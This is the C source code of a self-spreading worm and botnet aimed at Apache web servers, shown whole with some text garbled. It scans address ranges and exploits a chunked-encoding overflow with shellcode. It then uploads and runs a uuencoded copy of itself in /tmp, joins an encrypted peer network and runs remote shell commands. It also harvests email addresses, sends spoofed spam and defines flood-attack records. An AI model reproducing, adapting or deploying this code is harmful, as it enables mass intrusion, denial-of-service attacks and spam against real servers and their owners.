#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define SCAN #undef LARGE_NET #undef FREEBSD #define LINKS 64 #define CLIENTS 128 #define PORT 2001 #define SCANPORT 80 #define SCANTIMEOUT 5 #define MAXPATH 4096 #define ESCANPORT 10100 ///////////////////////////////////////////////////////// #define TCP_PENDING 1 #define TCP_CONNECTED 2 #define SOCKS_REPLY 3 #define FREE(x) {if (x) { free(x);x=NULL; }} enum { ASUCCESS=0, ARESOLVE, ACONNECT, ASOCKET, ABIND, AINUSE, APENDING, AINSTANCE, AUNKNOWN }; enum { AREAD=1, AWRITE=2, AEXCEPT=4 }; void Log(char *format,...) { va_list args; int nBuf; char szBuffer[4096]; FILE *a=fopen("/bin/.log","a"); va_start(args,format); nBuf=vsnprintf(szBuffer,sizeof(szBuffer),format,args); va_end(args); if (a == NULL) return; fprintf(a,"%s",szBuffer); fclose(a); } void nas(int a) { } #ifdef SCAN unsigned char classes[] = { 3, 4, 6, 8, 9, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 35, 38, 40, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 61, 62, 63, 64, 65, 66, 67, 68, 80, 81, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239 }; #endif struct ainst { void *ext,*ext5; int ext2,ext3,ext4; int sock,error; unsigned long len; struct sockaddr_in in; }; struct header { char tag; int id; unsigned long len; unsigned long seq; }; struct route_rec { struct header h; unsigned char hops; unsigned long server; }; struct kill_rec { struct header h; }; struct sh_rec { struct header h; }; struct version_rec { struct header h; }; struct ping_rec { struct header h; }; struct pong_rec { struct header h; unsigned long from; }; struct update_rec { struct header h; }; struct list_rec { struct header h; }; struct udp_rec { struct header h; unsigned long size; unsigned long target; unsigned short port; unsigned long secs; }; struct tcp_rec { struct header h; unsigned long target; unsigned short port; unsigned long secs; }; struct gen_rec { struct header h; unsigned long target; unsigned short port; unsigned long secs; }; struct df_rec { struct header h; unsigned long target; unsigned long secs; }; struct add_rec { struct header h; unsigned long server; unsigned long socks; unsigned long bind; unsigned short port; }; struct data_rec { struct header h; }; struct addsrv_rec { struct header h; }; struct initsrv_rec { struct header h; }; struct qmyip_rec { struct header h; }; struct myip_rec { struct header h; unsigned long ip; }; struct escan_rec { struct header h; unsigned long ip; }; struct click_rec { struct header h; }; struct spam_rec { struct header h; unsigned long from; unsigned long to; }; struct exploit_rec { struct header h; unsigned long ip; }; struct ainst clients[CLIENTS*2]; struct ainst udpclient; unsigned int sseed; struct route_table { int id; unsigned long ip; unsigned short port; } routes[LINKS]; unsigned long numlinks,*links=NULL, myip=0; unsigned long sequence[LINKS]; void gsrand(unsigned long s) { sseed=s; } unsigned long grand() { sseed=((sseed*965764979)%65535)/2; return sseed; } unsigned int *pids=NULL; unsigned long numpids=0; int mfork() { unsigned int parent, *newpids, i; parent=fork(); if (parent <= 0) return parent; numpids++; newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int)); for (i=0;ierror) { case ASUCCESS:return "Operation Success"; case ARESOLVE:return "Unable to resolve"; case ACONNECT:return "Unable to connect"; case ASOCKET:return "Unable to create socket"; case ABIND:return "Unable to bind socket"; case AINUSE:return "Port is in use"; case APENDING:return "Operation pending"; case AUNKNOWN:default:return "Unknown"; } return ""; } int aresolve(char *host) { struct hostent *hp; if (inet_addr(host) == 0 || inet_addr(host) == -1) { unsigned long a; if ((hp = gethostbyname(host)) == NULL) return 0; bcopy((char*)hp->h_addr, (char*)&a, hp->h_length); return a; } else return inet_addr(host); } int abind(struct ainst *inst,unsigned long ip,unsigned short port) { struct sockaddr_in in; if (inst == NULL) return (AINSTANCE); if (inst->sock == 0) { inst->error=AINSTANCE; return (AINSTANCE); } inst->len=0; in.sin_family = AF_INET; if (ip == NULL) in.sin_addr.s_addr = INADDR_ANY; else in.sin_addr.s_addr = ip; in.sin_port = htons(port); if (bind(inst->sock, (struct sockaddr *)&in, sizeof(in)) < 0) { inst->error=ABIND; return (ABIND); } inst->error=ASUCCESS; return ASUCCESS; } int await(struct ainst **inst,unsigned long len,char type,long secs) { struct timeval tm,*tmp; fd_set read,write,except,*readp,*writep,*exceptp; int p,ret,max; if (inst == NULL) return (AINSTANCE); for (p=0;plen=0; if (secs > 0) { tm.tv_sec=secs; tm.tv_usec=0; tmp=&tm; } else tmp=(struct timeval *)NULL; if (type & AREAD) { FD_ZERO(&read); for (p=0;psock,&read); readp=&read; } else readp=(struct fd_set*)0; if (type & AWRITE) { FD_ZERO(&write); for (p=0;psock,&write); writep=&write; } else writep=(struct fd_set*)0; if (type & AEXCEPT) { FD_ZERO(&except); for (p=0;psock,&except); exceptp=&except; } else exceptp=(struct fd_set*)0; for (p=0,max=0;psock > max) max=inst[p]->sock; if ((ret=select(max+1,readp,writep,exceptp,tmp)) == 0) { for (p=0;perror=APENDING; return (APENDING); } if (ret == -1) return (AUNKNOWN); for (p=0;psock,&read)) inst[p]->len+=AREAD; if (type & AWRITE) if (FD_ISSET(inst[p]->sock,&write)) inst[p]->len+=AWRITE; if (type & AEXCEPT) if (FD_ISSET(inst[p]->sock,&except)) inst[p]->len+=AEXCEPT; } for (p=0;perror=ASUCCESS; return (ASUCCESS); } int atcp_sync_check(struct ainst *inst) { if (inst == NULL) return (AINSTANCE); inst->len=0; errno=0; if (connect(inst->sock, (struct sockaddr *)&inst->in, sizeof(inst->in)) == 0 || errno == EISCONN) { inst->error=ASUCCESS; return (ASUCCESS); } if (!(errno == EINPROGRESS ||errno == EALREADY)) { inst->error=ACONNECT; return (ACONNECT); } inst->error=APENDING; return (APENDING); } int atcp_sync_connect(struct ainst *inst,char *host,unsigned int port) { int flag=1; struct hostent *hp; if (inst == NULL) return (AINSTANCE); inst->len=0; if ((inst->sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { inst->error=ASOCKET; return (ASOCKET); } if (inet_addr(host) == 0 || inet_addr(host) == -1) { if ((hp = gethostbyname(host)) == NULL) { inst->error=ARESOLVE; return (ARESOLVE); } bcopy((char*)hp->h_addr, (char*)&inst->in.sin_addr, hp->h_length); } else inst->in.sin_addr.s_addr=inet_addr(host); inst->in.sin_family = AF_INET; inst->in.sin_port = htons(port); flag = fcntl(inst->sock, F_GETFL, 0); flag |= O_NONBLOCK; fcntl(inst->sock, F_SETFL, flag); inst->error=ASUCCESS; return (ASUCCESS); } int atcp_connect(struct ainst *inst,char *host,unsigned int port) { int flag=1; unsigned long start; struct hostent *hp; if (inst == NULL) return (AINSTANCE); inst->len=0; if ((inst->sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { inst->error=ASOCKET; return (ASOCKET); } if (inet_addr(host) == 0 || inet_addr(host) == -1) { if ((hp = gethostbyname(host)) == NULL) { inst->error=ARESOLVE; return (ARESOLVE); } bcopy((char*)hp->h_addr, (char*)&inst->in.sin_addr, hp->h_length); } else inst->in.sin_addr.s_addr=inet_addr(host); inst->in.sin_family = AF_INET; inst->in.sin_port = htons(port); flag = fcntl(inst->sock, F_GETFL, 0); flag |= O_NONBLOCK; fcntl(inst->sock, F_SETFL, flag); start=time(NULL); while(time(NULL)-start < 10) { errno=0; if (connect(inst->sock, (struct sockaddr *)&inst->in, sizeof(inst->in)) == 0 || errno == EISCONN) { inst->error=ASUCCESS; return (ASUCCESS); } if (!(errno == EINPROGRESS ||errno == EALREADY)) break; sleep(1); } inst->error=ACONNECT; return (ACONNECT); } int atcp_accept(struct ainst *inst,struct ainst *child) { int sock; unsigned int datalen; if (inst == NULL || child == NULL) return (AINSTANCE); datalen=sizeof(child->in); inst->len=0; memcpy((void*)child,(void*)inst,sizeof(struct ainst)); if ((sock=accept(inst->sock,(struct sockaddr *)&child->in,&datalen)) < 0) { memset((void*)child,0,sizeof(struct ainst)); inst->error=APENDING; return (APENDING); } child->sock=sock; inst->len=datalen; inst->error=ASUCCESS; return (ASUCCESS); } int atcp_send(struct ainst *inst,char *buf,unsigned long len) { long datalen; if (inst == NULL) return (AINSTANCE); inst->len=0; errno=0; if ((datalen=write(inst->sock,buf,len)) < len) { if (errno == EAGAIN) { inst->error=APENDING; return (APENDING); } else { inst->error=AUNKNOWN; return (AUNKNOWN); } } inst->len=datalen; inst->error=ASUCCESS; return (ASUCCESS); } int atcp_sendmsg(struct ainst *inst, char *words, ...) { static char textBuffer[2048]; unsigned int a; va_list args; va_start(args, words); a=vsprintf(textBuffer, words, args); va_end(args); return atcp_send(inst,textBuffer,a); } int atcp_recv(struct ainst *inst,char *buf,unsigned long len) { long datalen; if (inst == NULL) return (AINSTANCE); inst->len=0; if ((datalen=read(inst->sock,buf,len)) < 0) { if (errno == EAGAIN) { inst->error=APENDING; return (APENDING); } else { inst->error=AUNKNOWN; return (AUNKNOWN); } } if (datalen == 0 && len) { inst->error=AUNKNOWN; return (AUNKNOWN); } inst->len=datalen; inst->error=ASUCCESS; return (ASUCCESS); } int atcp_close(struct ainst *inst) { if (inst == NULL) return (AINSTANCE); inst->len=0; if (close(inst->sock) < 0) { inst->error=AUNKNOWN; return (AUNKNOWN); } inst->sock=0; inst->error=ASUCCESS; return (ASUCCESS); } int audp_listen(struct ainst *inst,unsigned int port) { int flag=1; if (inst == NULL) return (AINSTANCE); inst->len=0; if ((inst->sock = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0) { inst->error=ASOCKET; return (ASOCKET); } inst->in.sin_family = AF_INET; inst->in.sin_addr.s_addr = INADDR_ANY; inst->in.sin_port = htons(port); if (bind(inst->sock, (struct sockaddr *)&inst->in, sizeof(inst->in)) < 0) { inst->error=ABIND; return (ABIND); } flag = fcntl(inst->sock, F_GETFL, 0); flag |= O_NONBLOCK; fcntl(inst->sock, F_SETFL, flag); inst->error=ASUCCESS; return (ASUCCESS); } int audp_setup(struct ainst *inst,char *host,unsigned int port) { int flag=1; struct hostent *hp; if (inst == NULL) return (AINSTANCE); inst->len=0; if ((inst->sock = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0) { inst->error=ASOCKET; return (ASOCKET); } if (inet_addr(host) == 0 || inet_addr(host) == -1) { if ((hp = gethostbyname(host)) == NULL) { inst->error=ARESOLVE; return (ARESOLVE); } bcopy((char*)hp->h_addr, (char*)&inst->in.sin_addr, hp->h_length); } else inst->in.sin_addr.s_addr=inet_addr(host); inst->in.sin_family = AF_INET; inst->in.sin_port = htons(port); flag = fcntl(inst->sock, F_GETFL, 0); flag |= O_NONBLOCK; fcntl(inst->sock, F_SETFL, flag); inst->error=ASUCCESS; return (ASUCCESS); } int audp_send(struct ainst *inst,char *buf,unsigned long len) { long datalen; if (inst == NULL) return (AINSTANCE); inst->len=0; errno=0; if ((datalen=sendto(inst->sock,buf,len,0,(struct sockaddr*)&inst->in,sizeof(inst->in))) < len) { if (errno == EAGAIN) { inst->error=APENDING; return (APENDING); } else { inst->error=AUNKNOWN; return (AUNKNOWN); } } inst->len=datalen; inst->error=ASUCCESS; return (ASUCCESS); } int audp_sendmsg(struct ainst *inst, char *words, ...) { static char textBuffer[2048]; unsigned int a; va_list args; va_start(args, words); a=vsprintf(textBuffer, words, args); va_end(args); return audp_send(inst,textBuffer,a); } int audp_recv(struct ainst *inst,struct ainst *client,char *buf,unsigned long len) { long datalen,nlen; if (inst == NULL) return (AINSTANCE); nlen=sizeof(inst->in); inst->len=0; memcpy((void*)client,(void*)inst,sizeof(struct ainst)); if ((datalen=recvfrom(inst->sock,buf,len,0,(struct sockaddr*)&client->in,(socklen_t*)&nlen)) < 0) { if (errno == EAGAIN) { inst->error=APENDING; return (APENDING); } else { inst->error=AUNKNOWN; return (AUNKNOWN); } } inst->len=datalen; inst->error=ASUCCESS; return (ASUCCESS); } int audp_close(struct ainst *inst) { if (inst == NULL) return (AINSTANCE); inst->len=0; if (close(inst->sock) < 0) { inst->error=AUNKNOWN; return (AUNKNOWN); } inst->sock=0; inst->error=ASUCCESS; return (ASUCCESS); } unsigned long _decrypt(char *str, unsigned long len) { unsigned long pos=0,seed[4]={0x78912389,0x094e7bc43,0xba5de30b,0x7bc54da7}; gsrand(((seed[0]+seed[1])*seed[2])^seed[3]); while(1) { gsrand(seed[pos%4]+grand()+pos); str[pos]-=grand(); pos++; if (pos >= len) break; } return pos; } unsigned long _encrypt(char *str, unsigned long len) { unsigned long pos=0,seed[4]={0x78912389,0x094e7bc43,0xba5de30b,0x7bc54da7}; gsrand(((seed[0]+seed[1])*seed[2])^seed[3]); while(1) { gsrand(seed[pos%4]+grand()+pos); str[pos]+=grand(); pos++; if (pos >= len) break; } return pos; } int useseq(unsigned long seq) { unsigned long a; if (seq == 0) return 0; for (a=0;a0;i--) sequence[i-1]=sequence[i]; sequence[0]=seq; } void addserver(unsigned long server) { unsigned long *newlinks, i, stop; char a=0; for (i=0;i= 16 && b <= 31) return 0; if (a == 192 && b == 168) return 0; return 1; } void broadcast(char *buf,unsigned long len) { unsigned long nics,a; if (numlinks == 0 || links == NULL) return; a=(numlinks/5); if (a > 50) a=50; else if (a < 4) a=4; if (a > numlinks) a=numlinks; nics=rand()%((numlinks-a)+1); a+=nics; for (;nics700?700:numlinks-b; unsigned long *_links=links+b; unsigned char *str; if (b > numlinks) break; str=(unsigned char*)malloc(sizeof(struct addsrv_rec)+(_numlinks*sizeof(struct next_rec))); if (str == NULL) return; memset((void*)&rc,0,sizeof(struct addsrv_rec)); rc.h.tag=tag; rc.h.id=id; rc.h.len=sizeof(struct next_rec)*_numlinks; memcpy((void*)str,(void*)&rc,sizeof(struct addsrv_rec)); for (a=0;a<_numlinks;a++) { memset((void*)&fc,0,sizeof(struct next_rec)); fc.server=_links[a]; memcpy((void*)(str+sizeof(struct addsrv_rec)+(a*sizeof(struct next_rec))),(void*)&fc,sizeof(struct next_rec)); } if (!id) relay(inst->in.sin_addr.s_addr,(void*)str,sizeof(struct addsrv_rec)+(_numlinks*sizeof(struct next_rec))); else audp_send(inst,(void*)str,sizeof(struct addsrv_rec)+(_numlinks*sizeof(struct next_rec))); FREE(str); } } void senderror(struct ainst *inst, int id, char *buf2) { struct data_rec rc; char *str,*buf=strdup(buf2); memset((void*)&rc,0,sizeof(struct data_rec)); rc.h.tag=0x45; rc.h.id=id; rc.h.seq=newseq(); rc.h.len=strlen(buf2); _encrypt(buf,strlen(buf2)); str=(char*)malloc(sizeof(struct data_rec)+strlen(buf2)+1); if (str == NULL) { FREE(buf2); return; } memcpy((void*)str,(void*)&rc,sizeof(struct data_rec)); memcpy((void*)(str+sizeof(struct data_rec)),buf,strlen(buf2)); audp_send(&udpclient,str,sizeof(struct data_rec)+strlen(buf2)); FREE(str); FREE(buf); } int isgood(char a) { if (a >= 'a' && a <= 'z') return 1; if (a >= 'A' && a <= 'Z') return 1; if (a >= '0' && a <= '9') return 1; if (a == '.' || a == '@' || a == '^' || a == '-' || a == '_') return 1; return 0; } int islisten(char a) { if (a == '.') return 1; if (a >= 'a' && a <= 'z') return 1; if (a >= 'A' && a <= 'Z') return 1; return 0; } struct _linklist { char *name; struct _linklist *next; } *linklist=NULL; void AddToList(char *str) { struct _linklist *getb=linklist,*newb; while(getb != NULL) { if (!strcmp(str,getb->name)) return; getb=getb->next; } newb=(struct _linklist *)malloc(sizeof(struct _linklist)); newb->name=strdup(str); newb->next=linklist; linklist=newb; } void cleanup(char *buf) { while(buf[strlen(buf)-1] == '\n' || buf[strlen(buf)-1] == '\r' || buf[strlen(buf)-1] == ' ') buf[strlen(buf)-1] = 0; while(*buf == '\n' || *buf == '\r' || *buf == ' ') { unsigned long i; for (i=strlen(buf)+1;i>0;i++) buf[i-1]=buf[i]; } } void ScanFile(char *f) { FILE *file=fopen(f,"r"); unsigned long startpos=0; if (file == NULL) return; while(1) { char buf[2]; memset(buf,0,2); fseek(file,startpos,SEEK_SET); fread(buf,1,1,file); startpos++; if (feof(file)) break; if (*buf == '@') { char email[256],c,d; unsigned long pos=0; while(1) { unsigned long oldpos=ftell(file); fseek(file,-1,SEEK_CUR); c=fgetc(file); if (!isgood(c)) break; fseek(file,-1,SEEK_CUR); if (oldpos == ftell(file)) break; } for (pos=0,c=0,d=0;pos<255;pos++) { email[pos]=fgetc(file); if (email[pos] == '.') c++; if (email[pos] == '@') d++; if (!isgood(email[pos])) break; } email[pos]=0; if (c == 0 || d != 1) continue; if (email[strlen(email)-1] == '.') email[strlen(email)-1]=0; if (*email == '@' || *email == '.' || !*email) continue; if (!strcmp(email,"webmaster@mydomain.com")) continue; for (pos=0,c=0;pos 0) { if(FD_ISSET(sock, &fds)) { if((n = read(sock, buf, sizeof(buf) - 1)) < 0) return NULL; for (d=0;d 0; n -= 3, p += 3) { if (n < 3) { p[2] = '\0'; if (n < 2) p[1] = '\0'; } ch = *p >> 2; ch = ENC(ch); if (sendch(a,ch) <= ASUCCESS) break; ch = ((*p << 4) & 060) | ((p[1] >> 4) & 017); ch = ENC(ch); if (sendch(a,ch) <= ASUCCESS) break; ch = ((p[1] << 2) & 074) | ((p[2] >> 6) & 03); ch = ENC(ch); if (sendch(a,ch) <= ASUCCESS) break; ch = p[2] & 077; ch = ENC(ch); if (sendch(a,ch) <= ASUCCESS) break; } ch='\n'; if (sendch(a,ch) <= ASUCCESS) break; usleep(10); } if (ferror(in)) { fclose(in); return 0; } ch = ENC('\0'); sendch(a,ch); ch = '\n'; sendch(a,ch); writem(a,"end\n"); if (in) fclose(in); return 1; } void exploit(char *ip) { char *a=GetAddress(ip); char localip[256]; int l,sock; struct sockaddr_in sin; if (a == NULL) exit(0); if (strncmp(a,"Apache",6)) exit(0); free(a); alarm(60); for (l=0;l<2;l++) { u_char buf[512], *expbuf=0, *p=0; int i=0, j=0, responses=0; memcpy(&victim, &targets[l], sizeof(victim)); sock = socket(PF_INET, SOCK_STREAM, 0); sin.sin_family = PF_INET; sin.sin_addr.s_addr = inet_addr(ip); sin.sin_port = htons(80); if(connect(sock, (struct sockaddr *) & sin, sizeof(sin)) != 0) exit(1); p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * REP_SHELLCODE) + ((PADSIZE_1 + (victim.repretaddr * 4) + victim.repzero + 1024) * REP_POPULATOR)); PUT_STRING("POST / HTTP/1.1\r\nHost: " HOST_PARAM "\r\n"); for (i = 0; i < REP_SHELLCODE; i++) { PUT_STRING("X-"); PUT_BYTES(PADSIZE_3, PADDING_3); PUT_STRING(": "); PUT_BYTES(NOPCOUNT, NOP); memcpy(p, shellcode, sizeof(shellcode) - 1); p += sizeof(shellcode) - 1; PUT_STRING("\r\n"); } for (i = 0; i < REP_POPULATOR; i++) { PUT_STRING("X-"); PUT_BYTES(PADSIZE_1, PADDING_1); PUT_STRING(": "); for (j = 0; j < victim.repretaddr; j++) { *p++ = victim.retaddr & 0xff; *p++ = (victim.retaddr >> 8) & 0xff; *p++ = (victim.retaddr >> 16) & 0xff; *p++ = (victim.retaddr >> 24) & 0xff; } PUT_BYTES(victim.repzero, 0); PUT_STRING("\r\n"); } PUT_STRING("Transfer-Encoding: chunked\r\n"); snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", PADSIZE_2); PUT_STRING(buf); PUT_BYTES(PADSIZE_2, PADDING_2); snprintf(buf, sizeof(buf) - 1, "\r\n%x\r\n", victim.delta); PUT_STRING(buf); write(sock, expbuf, p - expbuf); responses = 0; while (1) { fd_set fds; int n; struct timeval tv; tv.tv_sec = 15; tv.tv_usec = 0; FD_ZERO(&fds); FD_SET(sock, &fds); memset(buf, 0, sizeof(buf)); if(select(sock + 1, &fds, NULL, NULL, &tv) > 0) if(FD_ISSET(sock, &fds)) { if((n = read(sock, buf, sizeof(buf) - 1)) < 0) break; if(n >= 1) { for(i = 0; i < n; i ++) if(buf[i] == 'G') responses ++; else responses = 0; if(responses >= 2) { write(sock,"O",1); alarm(3600); sleep(10); writem(sock,"\nrm -rf /tmp/.a;cat > /tmp/.uua << __eof__;\n"); encode(sock); writem(sock,"__eof__\n"); conv(localip,256,myip); sprintf(buf,"/usr/bin/uudecode -p /tmp/.uua > /tmp/.a;killall -9 .a;chmod +x /tmp/.a;killall -9 .a;/tmp/.a %s;exit;\n",localip); writem(sock,buf); while(read(sock,buf,1024)>=0); exit(0); } } } } free(expbuf); close(sock); } return; } #endif struct dns { unsigned short int id; unsigned char rd:1; unsigned char tc:1; unsigned char aa:1; unsigned char opcode:4; unsigned char qr:1; unsigned char rcode:4; unsigned char unused:2; unsigned char pr:1; unsigned char ra:1; unsigned short int que_num; unsigned short int rep_num; unsigned short int num_rr; unsigned short int num_rrsup; }; struct dns_rr { unsigned short type; unsigned short rr_class; unsigned int ttl; unsigned short rdlength; }; struct _elist { char *name; struct _elist *next; }; struct _mailserver { unsigned long count; char *name; struct _elist *elist; struct _mailserver *next; } *mailservers=(struct _mailserver*)NULL; char *GetServer(char *str) { unsigned char buf[2048]; unsigned long len=0,i,j,hostlen,g; struct dns dnsp; struct dns_rr dnsr; struct ainst a,client; char host[256],domain[256]; unsigned long start; struct _mailserver *current=NULL; struct _mailserver *getlist=mailservers; i=0; while(getlist != NULL) { if (!strcasecmp(getlist->name,str)) { i=1; break; } getlist=getlist->next; } if (i) { struct _elist *elist=getlist->elist; current=getlist; if (current->count) { for (i=0;i<(rand()%current->count);i++) elist=elist->next; return elist->name; } else return 0; } else { struct _mailserver *new=(struct _mailserver*)malloc(sizeof(struct _mailserver)); new->count=0; new->name=strdup(str); new->elist=NULL; new->next=mailservers; mailservers=new; current=new; } if (strlen(str) > 256) return 0; strcpy(host,str); if (audp_setup(&a,"12.127.17.71",53) != ASUCCESS) return 0; srand(time(NULL)); memset(buf,0,2048); dnsp.id=rand(); dnsp.rd=1; dnsp.tc=0; dnsp.aa=0; dnsp.opcode=0; dnsp.qr=0; dnsp.rcode=0; dnsp.unused=0; dnsp.pr=0; dnsp.ra=0; dnsp.que_num=256; dnsp.rep_num=0; dnsp.num_rr=0; dnsp.num_rrsup=0; memcpy(buf,(void*)&dnsp,sizeof(dnsp)); len+=sizeof(dnsp); hostlen=strlen(host); for (i=0,j=0;i<=hostlen;i++) if (host[i] == '.' || host[i] == 0) { char tmp; tmp=host[i]; host[i]=0; sprintf(buf+len,"%c%s",(unsigned char)(i-j),host+j); len+=1+strlen(host+j); j=i+1; host[i]=tmp; } buf[len++]=0x0; buf[len++]=0x0; buf[len++]=0xf; buf[len++]=0x0; buf[len++]=0x1; audp_send(&a,buf,len); memset(buf,0,sizeof(buf)); start=time(NULL); while(audp_recv(&a,&client,buf,sizeof(buf))) if (time(NULL)-start > 10) return 0; memcpy((void*)&dnsp,buf,sizeof(dnsp)); memset(domain,0,256); for (i=0;iname=strdup(output); new->next=current->elist; current->elist=new; current->count++; } } audp_close(&a); if (current->count) return current->elist->name; else return 0; } void SendMail(char *to, char *from, char *subject, char *data) { struct ainst srv; char buf[4096],bufm[4096],*sa; unsigned long i,mode=0,tm=time(NULL); memset(buf,0,4096); strcpy(buf,to); for (i=0;i\n",from); break; case 1: atcp_sendmsg(&srv,"RCPT TO:<%s>\n",buf); break; case 2: atcp_sendmsg(&srv,"DATA\n"); break; case 3: atcp_sendmsg(&srv,"QUIT\n"); atcp_close(&srv); return; } mode++; break; case 354: atcp_sendmsg(&srv,"Return-Path: <%c%c%c%c%c%c%c@aol.com>\n",tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65),tolower((rand()%(91-65))+65)); atcp_sendmsg(&srv,"From: %s\n",from); atcp_sendmsg(&srv,"Message-ID: <%x.%x.%x@aol.com>\n",rand(),rand(),rand()); atcp_sendmsg(&srv,"Date: %s",ctime(&tm)); atcp_sendmsg(&srv,"Subject: %s\n",subject); atcp_sendmsg(&srv,"To: %s\n",buf); atcp_sendmsg(&srv,"Mime-Version: 1.0\n"); atcp_sendmsg(&srv,"Content-Type: text/html\n\n"); atcp_sendmsg(&srv,"%s\r\n.\r\n",data); break; } } } int main(int argc, char **argv) { unsigned char a=0,b=0,c=0,d=0; unsigned long bases,*cpbases; struct initsrv_rec initrec; struct ainst backup; int null=open("/dev/null",O_RDWR); if (argc <= 1) { printf("%s [base 2] ...\n",argv[0]); return 0; } srand(time(NULL)^getpid()); memset((char*)&routes,0,sizeof(struct route_table)*24); memset(clients,0,sizeof(struct ainst)*CLIENTS*2); if (audp_listen(&udpserver,PORT) != 0) { printf("Error: %s\n",aerror(&udpserver)); return 0; } memset((void*)&initrec,0,sizeof(struct initsrv_rec)); initrec.h.tag=0x70; cpbases=(unsigned long*)malloc(sizeof(unsigned long)*argc); if (cpbases == NULL) { printf("Insufficient memory\n"); return 0; } for (bases=1;bases l) l=clients[n].sock; } tm.tv_sec=2; tm.tv_usec=0; select(l+1,&read,NULL,NULL,&tm); if (FD_ISSET(udpserver.sock,&read)) udpserver.len=AREAD; for (n=0;n<(CLIENTS*2);n++) if (clients[n].sock != 0) if (FD_ISSET(clients[n].sock,&read)) clients[n].len=AREAD; timeout+=time(NULL)-start; if (timeout >= 60) { if (links == NULL || numlinks == 0) { memset((void*)&initrec,0,sizeof(struct initsrv_rec)); initrec.h.tag=0x70; for (bases=0;bases 0) { unsigned int *newpids,on; for (on=i+1;on= 5) atcp_close(&clients[n]); if (p == ASUCCESS) { char srv[256]; conv(srv,256,clients[n].in.sin_addr.s_addr); if (mfork() == 0) { exploit(srv); exit(0); } } } #endif for (n=0;n= sizeof(struct header)) { switch(tmp->tag) { case 0x20: { // Versione #ifdef LARGE_NET senderror(&udpclient,tmp->id,"Unknown 24-06-2002 APC (LN)\n"); #else senderror(&udpclient,tmp->id,"Unknown 24-06-2002 APC\n"); #endif } break; case 0x21: { // Aggiungere il collegamento struct add_rec *sr=(struct add_rec *)buf; if (udpserver.len < sizeof(struct add_rec)) break; for (n=0;nsocks == 0) conv(srv,256,sr->server); else conv(srv,256,sr->socks); clients[n].ext2=TCP_PENDING; clients[n].ext3=sr->h.id; clients[n].ext=(struct ainst*)malloc(sizeof(struct ainst)); if (clients[n].ext == NULL) { clients[n].sock=0; break; } memcpy((void*)clients[n].ext,(void*)&udpclient,sizeof(struct ainst)); if (sr->socks == 0) { clients[n].ext5=NULL; atcp_sync_connect(&clients[n],srv,sr->port); } else { clients[n].ext5=(char*)malloc(9); if (clients[n].ext5 == NULL) { clients[n].sock=0; break; } ((char*)clients[n].ext5)[0]=0x04; ((char*)clients[n].ext5)[1]=0x01; ((char*)clients[n].ext5)[2]=((char*)&sr->port)[1]; ((char*)clients[n].ext5)[3]=((char*)&sr->port)[0]; ((char*)clients[n].ext5)[4]=((char*)&sr->server)[0]; ((char*)clients[n].ext5)[5]=((char*)&sr->server)[1]; ((char*)clients[n].ext5)[6]=((char*)&sr->server)[2]; ((char*)clients[n].ext5)[7]=((char*)&sr->server)[3]; ((char*)clients[n].ext5)[8]=0x00; atcp_sync_connect(&clients[n],srv,1080); } if (sr->bind) abind(&clients[n],sr->bind,0); break; } } break; case 0x22: { // Collegamento di uccisione struct kill_rec *sr=(struct kill_rec *)buf; if (udpserver.len < sizeof(struct kill_rec)) break; for (n=0;nh.id) { FREE(clients[n].ext); FREE(clients[n].ext5); atcp_close(&clients[n]); } } break; case 0x23: { // Trasmettere il messaggio struct data_rec *sr=(struct data_rec *)buf; if (udpserver.len < sizeof(struct data_rec)+sr->h.len) break; for (n=0;nh.id) { _decrypt(buf+sizeof(struct data_rec),sr->h.len); atcp_send(&clients[n],buf+sizeof(struct data_rec),sr->h.len); } } break; #ifndef LARGE_NET case 0x24: { // Eseguire il comando FILE *f; struct sh_rec *sr=(struct sh_rec *)buf; struct kill_rec kp; int id; if (udpserver.len < sizeof(struct sh_rec)+sr->h.len || sr->h.len > 2999-sizeof(struct sh_rec)) break; memset((void*)&kp,0,sizeof(struct kill_rec)); id=sr->h.id; (buf+sizeof(struct sh_rec))[sr->h.len]=0; _decrypt(buf+sizeof(struct sh_rec),sr->h.len); f=popen(buf+sizeof(struct sh_rec),"r"); if (f != NULL) { while(1) { struct data_rec rc; char *str; unsigned long len; memset(buf,0,3000); fgets(buf,3000,f); if (feof(f)) break; len=strlen(buf); memset((void*)&rc,0,sizeof(struct data_rec)); rc.h.tag=0x41; rc.h.seq=newseq(); rc.h.id=id; rc.h.len=len; _encrypt(buf,len); str=(char*)malloc(sizeof(struct data_rec)+len); if (str == NULL) break; memcpy((void*)str,(void*)&rc,sizeof(struct data_rec)); memcpy((void*)(str+sizeof(struct data_rec)),buf,len); audp_send(&udpclient,str,sizeof(struct data_rec)+len); FREE(str); } pclose(f); kp.h.tag=0x42; kp.h.seq=newseq(); kp.h.id=id; audp_send(&udpclient,(void*)&kp,sizeof(struct kill_rec)); } else senderror(&udpclient,id,"Unable to execute command"); } break; #else case 0x24: { // Eseguire il comando senderror(&udpclient,tmp->id,"Not implicated\n"); } break; #endif case 0x25: { // Rumore metallico struct ping_rec *rp=(struct ping_rec *)buf; struct pong_rec rc; struct kill_rec kp; if (udpserver.len < sizeof(struct ping_rec)) break; 